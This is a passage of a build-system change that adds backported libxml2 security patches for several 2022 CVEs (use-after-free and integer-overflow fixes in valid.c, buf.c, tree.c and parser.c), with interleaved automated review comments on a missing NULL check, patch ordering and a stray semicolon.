+CVE: CVE-2022-23308
+Upstream-Status: Backport
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+diff --git a/valid.c b/valid.c
+index 8e596f1d..9684683a 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
+-/**
+- * xmlValidNormalizeString:
+- * @str: a string
+- *
+- * Normalize a string in-place.
+- */
+-static void
+-xmlValidNormalizeString(xmlChar *str) {
+- xmlChar *dst;
+- const xmlChar *src;
+-
+- if (str == NULL)
+- return;
+- src = str;
+- dst = str;
+-
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
+-}
+-
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ static int
+ xmlIsStreaming(xmlValidCtxtPtr ctxt) {
+ xmlParserCtxtPtr pctxt;
+--
+2.35.1
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
new file mode 100644
index 0000000000..bf5604e81a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
+From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Feb 2022 03:29:24 +0100
+Subject: [PATCH] Use-after-free of ID and IDREF attributes
+
+If a document is parsed with XML_PARSE_DTDVALID and without
+XML_PARSE_NOENT, the value of ID attributes has to be normalized after
+potentially expanding entities in xmlRemoveID. Otherwise, later calls
+to xmlGetID can return a pointer to previously freed memory.
+
+ID attributes which are empty or contain only whitespace after
+entity expansion are affected in a similar way. This is fixed by
+not storing such attributes in the ID table.
+
+The test to detect streaming mode when validating against a DTD was
+broken. In connection with the defects above, this could result in a
+use-after-free when using the xmlReader interface with validation.
+Fix detection of streaming mode to avoid similar issues. (This changes
+the expected result of a test case. But as far as I can tell, using the
+XML reader with XIncludes referencing the root document never worked
+properly, anyway.)
+
+All of these issues can result in denial of service. Using xmlReader
+with validation could result in disclosure of memory via the error
+channel, typically stderr. The security impact of xmlGetID returning
+a pointer to freed memory depends on the application. The typical use
+case of calling xmlGetID on an unmodified document is not affected.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
+
+The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
+to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
+this particular test does not exist in v2.9.10 (it was added later).
+
+CVE: CVE-2022-23308
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+---
+ valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
+ 1 file changed, 55 insertions(+), 33 deletions(-)
+
+diff --git a/valid.c b/valid.c
+index 07963e7..ee75311 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++static int
++xmlIsStreaming(xmlValidCtxtPtr ctxt) {
++ xmlParserCtxtPtr pctxt;
++
++ if (ctxt == NULL)
++ return(0);
++ /*
++ * These magic values are also abused to detect whether we're validating
++ * while parsing a document. In this case, userData points to the parser
++ * context.
++ */
++ if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
++ (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
++ return(0);
++ pctxt = ctxt->userData;
++ return(pctxt->parseMode == XML_PARSE_READER);
++}
++
+ /**
+ * xmlFreeID:
+ * @not: A id
+@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ if (doc == NULL) {
+ return(NULL);
+ }
+- if (value == NULL) {
++ if ((value == NULL) || (value[0] == 0)) {
+ return(NULL);
+ }
+ if (attr == NULL) {
+@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ */
+ ret->value = xmlStrdup(value);
+ ret->doc = doc;
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
+ ID = xmlNodeListGetString(doc, attr->children, 1);
+ if (ID == NULL)
+ return(-1);
++ xmlValidNormalizeString(ID);
+
+ id = xmlHashLookup(table, ID);
+ if (id == NULL || id->attr != attr) {
+@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ * fill the structure.
+ */
+ ret->value = xmlStrdup(value);
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+ int extsubset = 0;
+
+@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
+ xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
+ "standalone: %s on %s value had to be normalized based on external subset declaration\n",
+@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+
+ if (doc == NULL) return(NULL);
+@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ return(ret);
+ }
+
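Review bot: In the new `xmlIsStreaming()` helper (the valid.c hunk at -2607), `ctxt->userData` is dereferenced as a parser context with no NULL check; the only gate is `finishDtd` holding one of the two magic values. The in-code comment itself describes those values as being abused for this detection, so a validation context with a matching `finishDtd` but no parser context would, as far as this hunk shows, crash on `pctxt->parseMode`. A guard such as `if (pctxt == NULL) return(0);` before the final return would fall back to the non-streaming path instead. Because this file is a backport, the guard is probably better proposed upstream than carried as a local deviation.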
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
new file mode 100644
index 0000000000..63d613cc21
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
+From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 10 Jan 2020 15:55:07 +0100
+Subject: [PATCH] Fix integer overflow in xmlBufferResize
+
+Found by OSS-Fuzz.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ tree.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 0d7fc98c..f43f6de1 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (size < buf->size)
+ return 1;
+
++ if (size > UINT_MAX - 10) {
++ xmlTreeErrMemory("growing buffer");
++ return 0;
++ }
++
+ /* figure out new size */
+ switch (buf->alloc){
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ newSize = (buf->size ? buf->size : size + 10);
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+--
+GitLab
+
+
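Review bot: The header of this patch does not say that it is a prerequisite rather than the fix: it carries `CVE: CVE-2022-29824`, but the commit is dated 2020 and only touches `xmlBufferResize`. CVE-2022-29824.patch, added later in this change, rewrites the exact line introduced here (`newSize = (buf->size ? buf->size : size + 10);`), so the two have to be applied in order. I would add a sentence to the header, e.g. `Prerequisite for CVE-2022-29824.patch (tree.c context); must be listed before it in SRC_URI.`, so that a later cleanup does not drop or reorder it.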
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
new file mode 100644
index 0000000000..ad7b87dbc6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
+From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Mar 2022 20:10:02 +0100
+Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
+ xmlBuffer
+
+In several places, the code handling string buffers didn't check for
+integer overflow or used wrong types for buffer sizes. This could
+result in out-of-bounds writes or other memory errors when working on
+large, multi-gigabyte buffers.
+
+Thanks to Felix Wilhelm for the report.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ buf.c | 86 +++++++++++++++++++++++-----------------------------------
+ tree.c | 72 ++++++++++++++++++------------------------------
+ 2 files changed, 61 insertions(+), 97 deletions(-)
+
+diff --git a/buf.c b/buf.c
+index 24368d37..40a5ee06 100644
+--- a/buf.c
++++ b/buf.c
+@@ -30,6 +30,10 @@
+ #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
+ #include "buf.h"
+
++#ifndef SIZE_MAX
++#define SIZE_MAX ((size_t) -1)
++#endif
++
+ #define WITH_BUFFER_COMPAT
+
+ /**
+@@ -156,6 +160,8 @@ xmlBufPtr
+ xmlBufCreateSize(size_t size) {
+ xmlBufPtr ret;
+
++ if (size == SIZE_MAX)
++ return(NULL);
+ ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
+ if (ret == NULL) {
+ xmlBufMemoryError(NULL, "creating buffer");
+@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
+ ret->error = 0;
+ ret->buffer = NULL;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
+- ret->compat_size = (int) ret->size;
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
++ ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
+ CHECK_COMPAT(buf)
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (buf->use + len < buf->size)
++ if (len < buf->size - buf->use)
+ return(buf->size - buf->use);
++ if (len > SIZE_MAX - buf->use)
++ return(0);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > (size_t) len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
++ }
+
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
+ int
+ xmlBufResize(xmlBufPtr buf, size_t size)
+ {
+- unsigned int newSize;
++ size_t newSize;
+ xmlChar* rebuf = NULL;
+ size_t start_buf;
+
+@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ if (buf->size == 0) {
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
++ } else {
++ newSize = buf->size;
++ }
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ }
+
+@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ */
+ int
+ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+- unsigned int needSize;
++ size_t needSize;
+
+ if ((str == NULL) || (buf == NULL) || (buf->error))
+ return -1;
+@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((size_t) len >= buf->size - buf->use) {
++ if ((size_t) len >= SIZE_MAX - buf->use)
++ return(-1);
++ needSize = buf->use + len + 1;
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+ * Used to provide parsing limits
+@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufCCat(xmlBufPtr buf, const char *str) {
+- const char *cur;
+-
+- if ((buf == NULL) || (buf->error))
+- return(-1);
+- CHECK_COMPAT(buf)
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufResize(buf, buf->use+10)){
+- xmlBufMemoryError(buf, "growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- UPDATE_COMPAT(buf)
+- return 0;
++ return xmlBufCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+diff --git a/tree.c b/tree.c
+index 9d94aa42..86afb7d6 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7104,6 +7104,8 @@ xmlBufferPtr
+ xmlBufferCreateSize(size_t size) {
+ xmlBufferPtr ret;
+
++ if (size >= UINT_MAX)
++ return(NULL);
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+ xmlTreeErrMemory("creating buffer");
+@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
+ }
+ ret->use = 0;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
+
+ if ((mem == NULL) || (size == 0))
+ return(NULL);
++ if (size > UINT_MAX)
++ return(NULL);
+
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
+ */
+ int
+ xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
+- int size;
++ unsigned int size;
+ xmlChar *newbuf;
+
+ if (buf == NULL) return(-1);
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (len + buf->use < buf->size) return(0);
++ if (len < buf->size - buf->use)
++ return(0);
++ if (len > UINT_MAX - buf->use)
++ return(-1);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
++ }
+
+ if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
+ size_t start_buf = buf->content - buf->contentIO;
+@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size : size + 10);
++ if (buf->size == 0)
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
++ else
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ }
+
+@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((unsigned) len >= buf->size - buf->use) {
++ if ((unsigned) len >= UINT_MAX - buf->use)
++ return XML_ERR_NO_MEMORY;
++ needSize = buf->use + len + 1;
+ if (!xmlBufferResize(buf, needSize)){
+ xmlTreeErrMemory("growing buffer");
+ return XML_ERR_NO_MEMORY;
+@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufferCCat(xmlBufferPtr buf, const char *str) {
+- const char *cur;
+-
+- if (buf == NULL)
+- return(-1);
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufferCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufferResize(buf, buf->use+10)){
+- xmlTreeErrMemory("growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- return 0;
++ return xmlBufferCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+--
+GitLab
+
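Review bot: The rewritten bounds checks in `xmlBufGrowInternal`, `xmlBufAdd`, `xmlBufferGrow` and `xmlBufferAdd` all compare against `buf->size - buf->use`, which is only overflow-safe while `use <= size`, and nothing in these hunks establishes that. If the two fields can ever disagree (the function bodies start and end outside the hunks, so I cannot tell), the unsigned subtraction wraps and the resize is skipped. A one-line comment at each site, e.g. `/* requires buf->use <= buf->size, else the subtraction wraps */`, would record the assumption. Separately, the two `newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;` lines in `xmlBufferResize` end in a stray second semicolon.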
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
new file mode 100644
index 0000000000..bdb9e9eb7a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
+From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 25 Aug 2022 17:43:08 +0200
+Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
+
+Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
+to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
+XML_MAX_HUGE_LENGTH (1 billion bytes).
+
+Move some the length checks to the end of the respective loop to make
+them strict.
+
+xmlParseEntityValue didn't have a length limitation at all. But without
+XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
+
+Thanks to Maddie Stone working with Google Project Zero for the report!
+
+CVE: CVE-2022-40303
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
+Comments: Refreshed hunk
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ parser.c | 233 +++++++++++++++++++++++++++++--------------------------
+ 1 file changed, 121 insertions(+), 112 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 93f031be..79479979 100644
+--- a/parser.c
++++ b/parser.c
+@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
+ * *
+ ************************************************************************/
+
++#define XML_MAX_HUGE_LENGTH 1000000000
++
+ #define XML_PARSER_BIG_ENTITY 1000
+ #define XML_PARSER_LOT_ENTITY 5000
+
+@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
+ errmsg = "Malformed declaration expecting version";
+ break;
+ case XML_ERR_NAME_TOO_LONG:
+- errmsg = "Name too long use XML_PARSE_HUGE option";
++ errmsg = "Name too long";
+ break;
+ #if 0
+ case:
+@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNameComplex++;
+@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3338,7 +3344,10 @@ const xmlChar *
+ xmlParseName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ GROW;
+
+@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
+ in++;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ size_t startPosition = 0;
+
+ #ifdef DEBUG
+@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
+ (xmlIsNameChar(ctxt, c) && (c != ':'))) {
+ if (count++ > XML_PARSER_CHUNK_SIZE) {
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- return(NULL);
+- }
+ count = 0;
+ GROW;
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ if (c == 0) {
+@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
